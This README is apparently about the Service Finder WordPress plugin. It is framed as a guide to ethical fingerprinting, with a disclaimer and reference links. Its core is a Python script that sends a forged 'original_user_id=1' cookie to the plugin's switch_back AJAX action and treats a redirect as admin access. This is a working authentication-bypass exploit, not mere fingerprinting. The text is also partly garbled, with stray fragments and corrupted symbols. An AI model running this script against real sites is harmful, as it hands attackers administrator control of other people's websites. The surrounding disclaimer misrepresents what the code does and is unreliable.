The Service Finder plugin is a booking and service management system for WordPress.
Because of its popularity and complexity, some versions have had security issues related to unauthenticated AJAX endpoints or improper access controls.
This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
β οΈ Disclaimer:
These searches are for educational and research use only. Do not attempt unauthorized access or exploitation.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)300-399: β VULN ! Redirect to admin panel as ADMIN400-499:β οΈ Client error β the request was invalid or unauthorized, not vuln
- WPScan Plugin Database β https://wpscan.com/plugins/
- National Vulnerability Database (NVD) β https://nvd.nist.gov/
- OWASP β Google Dorking / reconnaissance techniques
- HackerOne Disclosure Guidelines β https://www.hackerone.com/disclosure-guidelines